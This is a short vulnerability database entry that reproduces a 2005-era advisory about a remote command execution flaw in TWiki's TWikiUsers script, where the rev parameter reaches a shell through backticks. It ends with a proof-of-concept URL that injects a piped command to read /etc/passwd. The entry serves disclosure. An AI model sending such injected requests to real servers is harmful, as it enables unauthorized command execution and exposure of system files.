TWiki TWikiUsers Remote Arbitrary Command Execution Vulnerability

2014-07-01T00:00:00
ID SSV:79903
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/14834/info

A remote command execution vulnerability affects the application.

The revision control function of the TWikiUsers script uses the backtick shell metacharacter to construct a command line. An attacker may use a specially crafted URI to execute arbitrary commands through the shell.

This attack would occur in the context of the vulnerable application and can facilitate unauthorized remote access. 

http://www.example.com/cgi-bin/view/Main/TWikiUsers?rev=2%20%7Cless%20/etc/passwd